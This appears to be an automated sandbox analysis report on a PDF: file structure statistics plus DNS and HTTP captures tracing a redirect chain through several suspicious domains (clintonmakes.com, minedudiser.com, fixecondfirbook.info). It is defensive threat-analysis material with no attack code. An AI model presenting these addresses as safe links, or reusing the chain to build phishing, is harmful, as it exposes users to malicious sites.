File Content Preview:	%PDF-1.4.1 0 obj.<<./Count 10./Kids [3 0 R.5 0 R.7 0 R.9 0 R.11 0 R.13 0 R.15 0 R.17 0 R.19 0 R.21 0 R]./MediaBox [0 0 595.28 841.89]./Type /Pages.>>.endobj.2 0 obj.<<./OpenAction [3 0 R /FitH null]./PageLayout /OneColumn./Pages 1 0 R./Type /Catalog.>>.en

General
Header:	%PDF-1.4
Total Entropy:	7.913766
Total Bytes:	162654
Stream Entropy:	7.979960
Stream Bytes:	147134
Entropy outside Streams:	5.226502
Bytes outside Streams:	15520
Number of EOF found:	1
Bytes after EOF:

Name	Count
obj	91
endobj	91
stream	35
endstream	35
xref	1
trailer	1
startxref	1
/Page	10
/Encrypt	0
/ObjStm	0
/URI	20
/JS	0
/JavaScript	0
/AA	0
/OpenAction	1
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 17:16:04.591875076 CET	49921	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:17.198668003 CET	51266	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:17.199804068 CET	54409	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:17.200323105 CET	53	64257	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:17.207082033 CET	53	54409	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:17.211694956 CET	53	57944	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:17.377002001 CET	53	51266	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:18.481997967 CET	53	65132	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:18.860245943 CET	56472	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:18.860470057 CET	55442	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:18.897313118 CET	53	55442	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:18.902482986 CET	53	56472	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:19.850152016 CET	58757	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:19.850711107 CET	58698	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:20.050005913 CET	53	58698	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:20.052681923 CET	53	58757	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:21.139242887 CET	53257	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:21.139556885 CET	62065	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:21.148001909 CET	53	53257	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:21.149696112 CET	53	62065	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:21.468751907 CET	49704	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:21.468919992 CET	57504	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:21.475440979 CET	53	49704	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:21.475724936 CET	53	57504	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:22.858256102 CET	53	56506	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:23.804049015 CET	53	51010	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:24.210239887 CET	50790	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:24.210654974 CET	55872	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:24.218660116 CET	53	55872	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:24.218703032 CET	53	50790	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:24.428353071 CET	53	64447	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:24.447679996 CET	54799	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:24.447870016 CET	58351	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:24.454780102 CET	53	54799	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:24.454834938 CET	53	58351	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:25.477140903 CET	59522	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:25.477299929 CET	60753	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:25.484061003 CET	53	59522	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:25.486788988 CET	53	60753	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:29.708779097 CET	53	61280	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:31.939990044 CET	138	138	192.168.2.7	192.168.2.255
Jan 16, 2025 17:16:33.560184002 CET	54636	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:35.558635950 CET	53	59784	1.1.1.1	192.168.2.7
Jan 16, 2025 17:16:50.590779066 CET	57965	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:16:54.365185976 CET	53	61158	1.1.1.1	192.168.2.7
Jan 16, 2025 17:17:09.435384035 CET	53616	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:17:16.865775108 CET	53	63534	1.1.1.1	192.168.2.7
Jan 16, 2025 17:17:16.948239088 CET	53	50751	1.1.1.1	192.168.2.7
Jan 16, 2025 17:17:18.909394979 CET	53	55783	1.1.1.1	192.168.2.7
Jan 16, 2025 17:17:38.232439041 CET	51816	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:17:38.232588053 CET	64805	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:17:38.239073992 CET	53	51816	1.1.1.1	192.168.2.7
Jan 16, 2025 17:17:38.239381075 CET	53	64805	1.1.1.1	192.168.2.7
Jan 16, 2025 17:17:43.971946001 CET	60914	53	192.168.2.7	1.1.1.1
Jan 16, 2025 17:17:47.130661011 CET	53	51109	1.1.1.1	192.168.2.7
Jan 16, 2025 17:18:02.460679054 CET	55320	53	192.168.2.7	1.1.1.1

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 17:16:04.599834919 CET	1.1.1.1	192.168.2.7	0x190c	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:04.599834919 CET	1.1.1.1	192.168.2.7	0x190c	No error (0)	crl.root-x1.letsencrypt.org.edgekey.net	e8652.dscx.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:04.599834919 CET	1.1.1.1	192.168.2.7	0x190c	No error (0)	e8652.dscx.akamaiedge.net		23.209.209.135	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:17.377002001 CET	1.1.1.1	192.168.2.7	0xd10d	No error (0)	clintonmakes.com		66.63.187.216	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:18.902482986 CET	1.1.1.1	192.168.2.7	0x4621	No error (0)	clintonmakes.com		66.63.187.216	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:20.052681923 CET	1.1.1.1	192.168.2.7	0xc511	No error (0)	minedudiser.com		186.64.116.70	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:21.148001909 CET	1.1.1.1	192.168.2.7	0xfde5	No error (0)	fixecondfirbook.info		104.21.94.195	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:21.148001909 CET	1.1.1.1	192.168.2.7	0xfde5	No error (0)	fixecondfirbook.info		172.67.168.162	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:21.149696112 CET	1.1.1.1	192.168.2.7	0x9795	No error (0)	fixecondfirbook.info			65	IN (0x0001)	false
Jan 16, 2025 17:16:21.475440979 CET	1.1.1.1	192.168.2.7	0x520a	No error (0)	www.google.com		142.250.185.228	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:21.475724936 CET	1.1.1.1	192.168.2.7	0x6f89	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 16, 2025 17:16:24.218660116 CET	1.1.1.1	192.168.2.7	0xf956	No error (0)	fixecondfirbook.info			65	IN (0x0001)	false
Jan 16, 2025 17:16:24.218703032 CET	1.1.1.1	192.168.2.7	0x7a55	No error (0)	fixecondfirbook.info		104.21.94.195	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:24.218703032 CET	1.1.1.1	192.168.2.7	0x7a55	No error (0)	fixecondfirbook.info		172.67.168.162	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:24.454780102 CET	1.1.1.1	192.168.2.7	0x4808	No error (0)	q-xx.bstatic.com	xx.bstatic.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:24.454780102 CET	1.1.1.1	192.168.2.7	0x4808	No error (0)	xx.bstatic.com	cf.bstatic.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:24.454780102 CET	1.1.1.1	192.168.2.7	0x4808	No error (0)	cf.bstatic.com	d2i5gg36g14bzn.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:24.454780102 CET	1.1.1.1	192.168.2.7	0x4808	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.53	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:24.454780102 CET	1.1.1.1	192.168.2.7	0x4808	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.129	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:24.454780102 CET	1.1.1.1	192.168.2.7	0x4808	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.49	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:24.454780102 CET	1.1.1.1	192.168.2.7	0x4808	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.18	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:24.454834938 CET	1.1.1.1	192.168.2.7	0xb310	No error (0)	q-xx.bstatic.com	xx.bstatic.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:24.454834938 CET	1.1.1.1	192.168.2.7	0xb310	No error (0)	xx.bstatic.com	cf.bstatic.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:24.454834938 CET	1.1.1.1	192.168.2.7	0xb310	No error (0)	cf.bstatic.com	d2i5gg36g14bzn.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:25.484061003 CET	1.1.1.1	192.168.2.7	0x9877	No error (0)	q-xx.bstatic.com	xx.bstatic.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:25.484061003 CET	1.1.1.1	192.168.2.7	0x9877	No error (0)	xx.bstatic.com	cf.bstatic.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:25.484061003 CET	1.1.1.1	192.168.2.7	0x9877	No error (0)	cf.bstatic.com	d2i5gg36g14bzn.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:25.484061003 CET	1.1.1.1	192.168.2.7	0x9877	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.49	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:25.484061003 CET	1.1.1.1	192.168.2.7	0x9877	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.18	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:25.484061003 CET	1.1.1.1	192.168.2.7	0x9877	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.129	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:25.484061003 CET	1.1.1.1	192.168.2.7	0x9877	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.53	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:25.486788988 CET	1.1.1.1	192.168.2.7	0x14f	No error (0)	q-xx.bstatic.com	xx.bstatic.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:25.486788988 CET	1.1.1.1	192.168.2.7	0x14f	No error (0)	xx.bstatic.com	cf.bstatic.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:25.486788988 CET	1.1.1.1	192.168.2.7	0x14f	No error (0)	cf.bstatic.com	d2i5gg36g14bzn.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:33.570203066 CET	1.1.1.1	192.168.2.7	0x712	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:33.570203066 CET	1.1.1.1	192.168.2.7	0x712	No error (0)	crl.root-x1.letsencrypt.org.edgekey.net	e8652.dscx.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:33.570203066 CET	1.1.1.1	192.168.2.7	0x712	No error (0)	e8652.dscx.akamaiedge.net		2.23.197.184	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:16:50.598474979 CET	1.1.1.1	192.168.2.7	0x968d	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:50.598474979 CET	1.1.1.1	192.168.2.7	0x968d	No error (0)	crl.root-x1.letsencrypt.org.edgekey.net	e8652.dscx.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:16:50.598474979 CET	1.1.1.1	192.168.2.7	0x968d	No error (0)	e8652.dscx.akamaiedge.net		23.209.209.135	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:17:09.444775105 CET	1.1.1.1	192.168.2.7	0x4f26	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:17:09.444775105 CET	1.1.1.1	192.168.2.7	0x4f26	No error (0)	crl.root-x1.letsencrypt.org.edgekey.net	e8652.dscx.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:17:09.444775105 CET	1.1.1.1	192.168.2.7	0x4f26	No error (0)	e8652.dscx.akamaiedge.net		2.23.197.184	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:17:38.239073992 CET	1.1.1.1	192.168.2.7	0xffa5	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:17:43.980688095 CET	1.1.1.1	192.168.2.7	0x2e25	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:17:43.980688095 CET	1.1.1.1	192.168.2.7	0x2e25	No error (0)	crl.root-x1.letsencrypt.org.edgekey.net	e8652.dscx.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:17:43.980688095 CET	1.1.1.1	192.168.2.7	0x2e25	No error (0)	e8652.dscx.akamaiedge.net		23.209.209.135	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:18:02.467905998 CET	1.1.1.1	192.168.2.7	0x7bd	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:18:02.467905998 CET	1.1.1.1	192.168.2.7	0x7bd	No error (0)	crl.root-x1.letsencrypt.org.edgekey.net	e8652.dscx.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:18:02.467905998 CET	1.1.1.1	192.168.2.7	0x7bd	No error (0)	e8652.dscx.akamaiedge.net		2.23.197.184	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 17:16:04.609507084 CET	115	OUT	GET / HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/10.0 Host: x1.i.lencr.org
Jan 16, 2025 17:16:05.253392935 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Content-Type: application/pkix-cert Last-Modified: Fri, 04 Aug 2023 20:57:56 GMT ETag: "64cd6654-56f" Content-Disposition: attachment; filename="ISRG Root X1.der" Cache-Control: max-age=50610 Expires: Fri, 17 Jan 2025 06:19:35 GMT Date: Thu, 16 Jan 2025 16:16:05 GMT Content-Length: 1391 Connection: keep-alive Data Raw: 30 82 05 6b 30 82 03 53 a0 03 02 01 02 02 11 00 82 10 cf b0 d2 40 e3 59 44 63 e0 bb 63 82 8b 00 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 4f 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 29 30 27 06 03 55 04 0a 13 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 52 65 73 65 61 72 63 68 20 47 72 6f 75 70 31 15 30 13 06 03 55 04 03 13 0c 49 53 52 47 20 52 6f 6f 74 20 58 31 30 1e 17 0d 31 35 30 36 30 34 31 31 30 34 33 38 5a 17 0d 33 35 30 36 30 34 31 31 30 34 33 38 5a 30 4f 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 29 30 27 06 03 55 04 0a 13 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 52 65 73 65 61 72 63 68 20 47 72 6f 75 70 31 15 30 13 06 03 55 04 03 13 0c 49 53 52 47 20 52 6f 6f 74 20 58 31 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 ad e8 24 73 f4 14 37 f3 9b 9e 2b 57 28 1c 87 be dc b7 df 38 90 8c 6e 3c e6 57 a0 78 f7 75 c2 a2 fe f5 6a 6e f6 00 4f 28 db de 68 86 6c 44 93 b6 b1 63 fd 14 12 6b bf 1f d2 ea 31 9b 21 7e d1 33 [TRUNCATED] Data Ascii: 0k0S@YDcc0H0O10UUS1)0'U Internet Security Research Group10UISRG Root X10150604110438Z350604110438Z0O10UUS1)0'U Internet Security Research Group10UISRG Root X10"0H0$s7+W(8n<WxujnO(hlDck1!~3<Hy!KqiJffl~<p)"K~G\|H#S8Oo.IWt/8{p!u0<cOK~w.{JL%p)S$J?aQcq.o[\4ylv;by/&676urIAv5/(ldwnG7Y^hrA)>Y>&$ZL@F:Qn;}rxY>Qx/>{JKsP\|Ctt0[q600\H;}`)A\|;FHvvj=8d+(B"']ypN:'Qnd3COB0@0U0U00UyY{sXn0*HUX
Jan 16, 2025 17:16:05.253407955 CET	509	IN	Data Raw: a9 bc b2 a8 50 d0 0c b1 d8 1a 69 20 27 29 08 ac 61 75 5c 8a 6e f8 82 e5 69 2f d5 f6 56 4b b9 b8 73 10 59 d3 21 97 7e e7 4c 71 fb b2 d2 60 ad 39 a8 0b ea 17 21 56 85 f1 50 0e 59 eb ce e0 59 e9 ba c9 15 ef 86 9d 8f 84 80 f6 e4 e9 91 90 dc 17 9b 62 Data Ascii: Pi ')au\ni/VKsY!~Lq`9!VPYYbEf\|o;'}~"+"4[XT&3L-<W,N;1"ss993#L<U)"k;W:pMMl]+NEJ&rj

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 17:16:18.926410913 CET	468	OUT	GET /215c/ HTTP/1.1 Host: clintonmakes.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: f5510ad44=0ad448213ea0
Jan 16, 2025 17:16:19.775774956 CET	448	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:16:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked server: Apache/2.4.37 (Rocky Linux) Content-Encoding: gzip Data Raw: 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 91 b1 6e c3 20 10 86 5f 85 b2 78 72 69 33 a5 8e ed 25 cd dc 0e 59 3a 45 04 2e 36 aa 01 e7 38 da fa ed 4b 62 a7 b2 54 45 f2 c2 e9 a4 ef ff 38 b8 f2 e1 f5 6d bb ff 78 df b1 96 6c 57 97 d3 09 52 d7 25 19 ea a0 2e c5 54 2d 90 4c 14 f5 39 9c a3 f9 aa f8 d6 3b 02 47 f9 7e e8 81 33 35 76 15 27 f8 21 71 f1 6c 98 6a 25 06 a0 2a d2 29 5f f3 49 e1 a4 85 44 7d 1b 22 c0 42 49 d4 b3 70 88 d6 4a 1c 0e 9d c4 06 0e c6 ca 06 6e b9 1e 7d 0f 48 43 c5 7d 53 5c 67 9a e5 b8 f8 47 dd 6e 58 80 26 a1 86 a0 d0 f4 64 bc 5b a6 5d 1c 48 f2 f1 1d 33 ea ae f5 1e 39 fb f7 0c e1 84 10 da ec 8f ca 9e 36 2c 62 57 5d a0 50 08 61 8d 03 1d b5 09 80 8f ca 5b 71 f4 fe d3 e8 f5 6a f5 f2 9c a5 7d 8e db 3d 7a 3d a4 66 2a d7 bd b3 5f 9e 07 89 53 0e 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: fcn _xri3%Y:E.68KbTE8mxlWR%.T-L9;G~35v'!qlj%)_ID}"BIpJn}HC}S\gGnX&d[]H396,bW]Pa[qj}=z=f_S0
Jan 16, 2025 17:16:19.858458996 CET	381	OUT	GET /favicon.ico HTTP/1.1 Host: clintonmakes.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://clintonmakes.com/215c/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 16, 2025 17:16:20.219535112 CET	371	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 16:16:20 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked server: Apache/2.4.37 (Rocky Linux) Content-Encoding: gzip Data Raw: 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d ce 4d 0f 82 30 0c 06 e0 bf 52 b9 4b d1 70 6c 76 90 8f 48 82 48 cc 38 78 c4 ac 04 12 64 c8 86 c6 7f ef 74 17 2f 4d da f7 c9 9b d2 26 3d 27 f2 5a 67 70 94 a7 12 ea e6 50 16 09 04 5b c4 22 93 39 62 2a 53 9f ec c3 08 31 ab 02 41 bd bd 8f 6e 72 ab 04 d9 c1 8e 2c e2 28 86 4a 5b c8 f5 3a 29 42 7f 24 f4 e4 a6 d5 db f1 9d f8 13 6e a3 59 c8 9e 61 e1 c7 ca c6 b2 82 e6 52 c2 ab 35 30 39 d6 7d 19 e8 09 6c 3f 18 30 bc 3c 79 09 09 67 57 ea eb f0 f7 04 7c 00 b6 fe c5 76 be 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a8MM0RKplvHH8xdt/M&='ZgpP["9b*S1Anr,(J[:)B$nYaR509}l?0<ygW\|v0

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 17:16:29.571960926 CET	212	IN	HTTP/1.0 408 Request Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>
Jan 16, 2025 17:17:14.574315071 CET	6	OUT	Data Raw: 00 Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:16:18 UTC	664	OUT	GET /215c/ HTTP/1.1 Host: clintonmakes.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:16:18 UTC	210	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:16:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1069 Connection: close Set-Cookie: f5510ad44=0ad448213ea0 server: Apache/2.4.37 (Rocky Linux)
2025-01-16 16:16:18 UTC	828	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 3c 6d 65 74 61 20 70 72 6f Data Ascii: <!DOCTYPE html><html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="twitter:card" content="summary_large_image"><meta property="og:title" content=""/><meta property="twitter:title" content=""/><meta pro

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:16:20 UTC	690	OUT	GET /bookid82291 HTTP/1.1 Host: minedudiser.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: http://clintonmakes.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:16:21 UTC	344	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 16 Jan 2025 16:16:21 GMT Server: Apache Strict-Transport-Security: max-age=63072000; includeSubdomains; Location: https://fixecondfirbook.info/ Cache-Control: max-age=0 Expires: Thu, 16 Jan 2025 16:16:21 GMT Content-Length: 237 Connection: close Content-Type: text/html; charset=iso-8859-1
2025-01-16 16:16:21 UTC	237	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 69 78 65 63 6f 6e 64 66 69 72 62 6f 6f 6b 2e 69 6e 66 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://fixecondfirbook.info/">here</a>.</p></body></html>

Timestamp	Bytes transferred	Direction	Data
